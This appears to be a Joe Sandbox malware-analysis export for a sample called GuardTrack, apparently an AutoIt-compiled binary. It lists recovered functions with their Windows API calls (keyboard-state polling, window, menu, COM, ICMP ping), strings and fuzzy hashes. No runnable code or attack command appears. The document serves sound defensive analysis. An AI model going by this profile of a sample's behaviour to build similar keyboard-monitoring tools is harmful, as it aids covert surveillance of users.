Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 46f9a0c3ba27a13bf55f80f46a79609cf141b34023a3a35ee7fe1b7a60c31862
Instruction ID: 6be8246a1d7af0cae3d17babefc87cde342697abcf32c34f7056a8c3456a8e22
Opcode Fuzzy Hash: 46f9a0c3ba27a13bf55f80f46a79609cf141b34023a3a35ee7fe1b7a60c31862
Instruction Fuzzy Hash: 40B1CA75A00119AFDB14DFA4C889DAEBBBAFF89304B148499E905EB351DB30ED45CF90

Function 0061081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00610896
SetKeyboardState.USER32(?), ref: 00610901
GetAsyncKeyState.USER32(000000A0), ref: 00610921
GetKeyState.USER32(000000A0), ref: 00610938
GetAsyncKeyState.USER32(000000A1), ref: 00610967
GetKeyState.USER32(000000A1), ref: 00610978
GetAsyncKeyState.USER32(00000011), ref: 006109A4
GetKeyState.USER32(00000011), ref: 006109B2
GetAsyncKeyState.USER32(00000012), ref: 006109DB
GetKeyState.USER32(00000012), ref: 006109E9
GetAsyncKeyState.USER32(0000005B), ref: 00610A12
GetKeyState.USER32(0000005B), ref: 00610A20

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a72a062016a43dead661d4b1f6d9d7dfcf0b0d40c121e50cb3199219b408f5d0
Instruction ID: 25050d656ac465d51f40b77b387c0e60510960812d54527f2255bfb444f1455a
Opcode Fuzzy Hash: a72a062016a43dead661d4b1f6d9d7dfcf0b0d40c121e50cb3199219b408f5d0
Instruction Fuzzy Hash: 8C51B924A0879829FF75DBA044107EABFB69F02780F0C459DD5C25B2C3DAA49ACCC795

Function 0060CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0060CE1C
GetWindowRect.USER32(00000000,?), ref: 0060CE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0060CE8C
GetDlgItem.USER32(?,00000002), ref: 0060CE97
GetWindowRect.USER32(00000000,?), ref: 0060CEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0060CEFD
GetDlgItem.USER32(?,000003E9), ref: 0060CF0B
GetWindowRect.USER32(00000000,?), ref: 0060CF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0060CF5F
GetDlgItem.USER32(?,000003EA), ref: 0060CF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0060CF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 0060CF97

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 5f14eec586b9470d22c58462cd9541c87fa0666cd7c98ddd5a35c93b1149d345
Instruction ID: d373330822152ad1cc8e68a0bdab826084903d3e8e4b09b8d36e949dccc17f82
Opcode Fuzzy Hash: 5f14eec586b9470d22c58462cd9541c87fa0666cd7c98ddd5a35c93b1149d345
Instruction Fuzzy Hash: F1515175B40205AFDB18CF68CD89AAEBBB7EB89710F14822DF616D72D0D770AD008B50

Function 005B2581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 005B29AB: GetWindowLongW.USER32(?,000000EB), ref: 005B29BC

GetSysColor.USER32(0000000F), ref: 005B25AF

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 60432f521b554720fe86e3f9f5fc051386d4abfc5766c15c46d8f56467100ff3
Instruction ID: 389560d5441b70d614d6dff2d06766eb0e6f35feadf1fa0c1914a40383b727ba
Opcode Fuzzy Hash: 60432f521b554720fe86e3f9f5fc051386d4abfc5766c15c46d8f56467100ff3
Instruction Fuzzy Hash: 9841A135004150ABDB255F689888BF93F66FB0A331F194265FEA68B1E5CB309C42DB31

Function 005C29BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 005D0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,005C2A3E,?,00008000), ref: 005D0BA7

Part of subcall function 005D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C2A58,?,00008000), ref: 005D02A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 005C2ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 005C2C2C

Part of subcall function 005C3EBE: _wcscpy.LIBCMT ref: 005C3EF6

Part of subcall function 005D386D: _iswctype.LIBCMT ref: 005D3875

Strings

EA06, xrefs: 005FFD48
Unterminated string, xrefs: 006000D6
Bad directive syntax error, xrefs: 0060008F
AU3!, xrefs: 005C2A93
#include depth exceeded. Make sure there are no recursive includes, xrefs: 005FFD17
Error opening the file, xrefs: 005FFD33, 005FFDAA

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: afc73be1d56cd1f4ad47a0f1a9b5f4943d786c82ee1f9a5ac31ae5bec1a5fc02
Instruction ID: 02cf5f3fe20ebc27ba0a9395b744974728561541dedba86114e01fbc6210cbd3
Opcode Fuzzy Hash: afc73be1d56cd1f4ad47a0f1a9b5f4943d786c82ee1f9a5ac31ae5bec1a5fc02
Instruction Fuzzy Hash: 01027A301083469FC724EF64C855EAFBBE5BFD5314F04492EF59A932A2DB309A49CB52

Function 005B4D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 005B4D62
__swprintf.LIBCMT ref: 005B4DAC
__i64tow.LIBCMT ref: 005EDB3B

Strings

%.15g, xrefs: 005B4DA6
0x%p, xrefs: 005EDB1D
True, xrefs: 005EDAFC
False, xrefs: 005EDB03

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: f0b5819058f25ce59e39ffed84c94402899d240397b4187b9cd19d6d8ecc95f8
Instruction ID: 11e9151f21c33def6ff314f9de5a5de43d63112db0d0fa3dbec765891671b834
Opcode Fuzzy Hash: f0b5819058f25ce59e39ffed84c94402899d240397b4187b9cd19d6d8ecc95f8
Instruction Fuzzy Hash: 9041B57150420AAFDB34DF68D846E7A7BF9FB45300F20486FE189D7292EA71A941CB21

Function 00637777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0063778F
CreateMenu.USER32 ref: 006377AA
SetMenu.USER32(?,00000000), ref: 006377B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00637846
IsMenu.USER32(?), ref: 0063785C
CreatePopupMenu.USER32 ref: 00637866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00637893
DrawMenuBar.USER32 ref: 0063789B

Strings

F, xrefs: 00637887
0, xrefs: 00637785

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: b4def6825aabcc13db38fe41dc607d53a3ed1fdff8289825183dd61a40ecb280
Instruction ID: 298b060dc426f07121a11c062649bf27a6b391a2c589d0d8f9aab0f18f497ee9
Opcode Fuzzy Hash: b4def6825aabcc13db38fe41dc607d53a3ed1fdff8289825183dd61a40ecb280
Instruction Fuzzy Hash: DD415CB8A00209EFDB24DF64D988ADA7BF6FF49310F144029FA45A7360D730A910CF90

Function 00637AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00637B83
CreateCompatibleDC.GDI32(00000000), ref: 00637B8A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00637B9D
SelectObject.GDI32(00000000,00000000), ref: 00637BA5
GetPixel.GDI32(00000000,00000000,00000000), ref: 00637BB0
DeleteDC.GDI32(00000000), ref: 00637BB9
GetWindowLongW.USER32(?,000000EC), ref: 00637BC3
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00637BD7
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00637BE3

Strings

static, xrefs: 00637B1B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 41e2c939f353a58d67a7aa25a356d4a77df6e542482493d0930dddfbeb750269
Instruction ID: 53e49f064df3964adf73a384d63b352965fcc7de3a5ff4a125b1c3ae5cb33e51
Opcode Fuzzy Hash: 41e2c939f353a58d67a7aa25a356d4a77df6e542482493d0930dddfbeb750269
Instruction Fuzzy Hash: 7D318175104119ABEF215F64DC49FDB7B6AFF0A720F111214FA56A61A0C731D820DBA4

Function 005D7030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005D706B

Part of subcall function 005D8D58: __getptd_noexit.LIBCMT ref: 005D8D58

__gmtime64_s.LIBCMT ref: 005D7104
__gmtime64_s.LIBCMT ref: 005D713A
__gmtime64_s.LIBCMT ref: 005D7157
__allrem.LIBCMT ref: 005D71AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005D71C9
__allrem.LIBCMT ref: 005D71E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005D71FE
__allrem.LIBCMT ref: 005D7215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005D7233
__invoke_watson.LIBCMT ref: 005D72A4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: 7d5d17cb3abd6cf31abc13eba119cac00c435afdf704f928790bd15005db497e
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: 2D71D671A0475BABD7249A7DCC8AB6ABBA9BF58320F14422BF514D73C1F770D9408B90

Function 00612CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00612CE9
GetMenuItemInfoW.USER32(00677890,000000FF,00000000,00000030), ref: 00612D4A
SetMenuItemInfoW.USER32(00677890,00000004,00000000,00000030), ref: 00612D80
Sleep.KERNEL32(000001F4), ref: 00612D92
GetMenuItemCount.USER32(?), ref: 00612DD6
GetMenuItemID.USER32(?,00000000), ref: 00612DF2
GetMenuItemID.USER32(?,-00000001), ref: 00612E1C
GetMenuItemID.USER32(?,?), ref: 00612E61
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00612EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00612EBB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00612EDC

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: dd360feea8debbe926bdb3d32d1e8fd60e82c973e0ac50e37c286ece036dcca9
Instruction ID: 2e7904fe10ff9d239f49477910a2a63321ab9f7268f0bf275eb060de3dd9cf8c
Opcode Fuzzy Hash: dd360feea8debbe926bdb3d32d1e8fd60e82c973e0ac50e37c286ece036dcca9
Instruction Fuzzy Hash: 9861B07090024AAFDB14DF64DD98AFE7BBAEF41304F184059F851A7351D731AEA5CB21

Function 00637548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006375CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006375CD
GetWindowLongW.USER32(?,000000F0), ref: 006375F1
_memset.LIBCMT ref: 00637602
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00637614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0063768C

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: c1b8ef8851b5b8548a35f6cfd7f7a357135f97566f4bbba428ccc8a0ee5a874a
Instruction ID: c98daf41b3678d5821ec11b48b1ee82d18700572b494b84217376a030180a07c
Opcode Fuzzy Hash: c1b8ef8851b5b8548a35f6cfd7f7a357135f97566f4bbba428ccc8a0ee5a874a
Instruction Fuzzy Hash: 5D618BB5900208AFDB20DFA4CC85EEE77F9EB09710F144199FA14A73A1C770AE41DBA0

Function 006077B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006077DD
SafeArrayAllocData.OLEAUT32(?), ref: 00607836
VariantInit.OLEAUT32(?), ref: 00607848
SafeArrayAccessData.OLEAUT32(?,?), ref: 00607868
VariantCopy.OLEAUT32(?,?), ref: 006078BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 006078CF
VariantClear.OLEAUT32(?), ref: 006078E4
SafeArrayDestroyData.OLEAUT32(?), ref: 006078F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006078FA
VariantClear.OLEAUT32(?), ref: 0060790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00607917

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: f0fa5227f1d2dc366584f4d30f2c4f2b277f0888d40a057a89ad649f38c3aaa8
Instruction ID: 7c02eaaafa92cbda8f38a30837bf6031565f5b844792a013bfe5d7b3f53c6f70
Opcode Fuzzy Hash: f0fa5227f1d2dc366584f4d30f2c4f2b277f0888d40a057a89ad649f38c3aaa8
Instruction Fuzzy Hash: B4415335E00119DFDB04DFA4D8489EEBBFAFF48354F008469EA55A7261D730AA45CFA0

Function 00628AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC

CoInitialize.OLE32 ref: 00628AED
CoUninitialize.OLE32 ref: 00628AF8
CoCreateInstance.OLE32(?,00000000,00000017,00643BBC,?), ref: 00628B58
IIDFromString.OLE32(?,?), ref: 00628BCB
VariantInit.OLEAUT32(?), ref: 00628C65
VariantClear.OLEAUT32(?), ref: 00628CC6

Strings

Invalid parameter, xrefs: 00628BE4
Failed to create object, xrefs: 00628B63, 00628C19
NULL Pointer assignment, xrefs: 00628B9D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: b1a14c605aa94ff689fa70afb3ebf7ddc84378c5f56c6fd6df33e1a41f4b6a93
Instruction ID: 7428ea4b6b36f25f0ba62c4de4eb072bd6ca0e86ffb18a2bde01bee59d2e40bb
Opcode Fuzzy Hash: b1a14c605aa94ff689fa70afb3ebf7ddc84378c5f56c6fd6df33e1a41f4b6a93
Instruction Fuzzy Hash: A8619F70205B219FD710DF14D889BAABBE6BF85715F00084DF9859B291CB70ED45CFA6

Function 00625E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00625E7E
inet_addr.WSOCK32(?,?,?), ref: 00625EC3
gethostbyname.WSOCK32(?), ref: 00625ECF
IcmpCreateFile.IPHLPAPI ref: 00625EDD
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00625F4D
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00625F63
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00625FD8
WSACleanup.WSOCK32 ref: 00625FDE

Strings

Ping, xrefs: 00625F01

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 2db8bca257199a682a7edfc6924fc109092942942b7954f56568ccc755c8964b
Instruction ID: e3bcc4ba24260963e6be992781854e67436dc98c254b2e3569c5ef8f13fa5353
Opcode Fuzzy Hash: 2db8bca257199a682a7edfc6924fc109092942942b7954f56568ccc755c8964b
Instruction Fuzzy Hash: 56519031604A119FD720EF24DD49F6ABBE6EF88710F144929F996DB2A1DB70E900CF42

Function 0061BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0061BB13
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0061BB89
GetLastError.KERNEL32 ref: 0061BB93
SetErrorMode.KERNEL32(00000000,READY), ref: 0061BC00

Strings

NOTREADY, xrefs: 0061BBBF
READY, xrefs: 0061BBD9
READONLY, xrefs: 0061BBCB
INVALID, xrefs: 0061BBD2
UNKNOWN, xrefs: 0061BBB8

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 1646531061d95d957a4da1dbda0ba2a291f21b3c94d2c861e0d473be89aaaac5
Instruction ID: 8ad18d5a7eb25550ca8847250f4b57644996cdfdce9fc39c7896eb58407c88af
Opcode Fuzzy Hash: 1646531061d95d957a4da1dbda0ba2a291f21b3c94d2c861e0d473be89aaaac5
Instruction Fuzzy Hash: 2531B235A04209AFCB10DF64C849EEEBBB6FF45310F189169E905D7796DF70A982CB90

Function 006134DD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0061357C

Strings

info, xrefs: 0061351D
,zg0zg, xrefs: 0061358D
stop, xrefs: 0061354D
,zg0zg, xrefs: 0061350F
warning, xrefs: 00613565
question, xrefs: 00613535
blank, xrefs: 006134FE

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
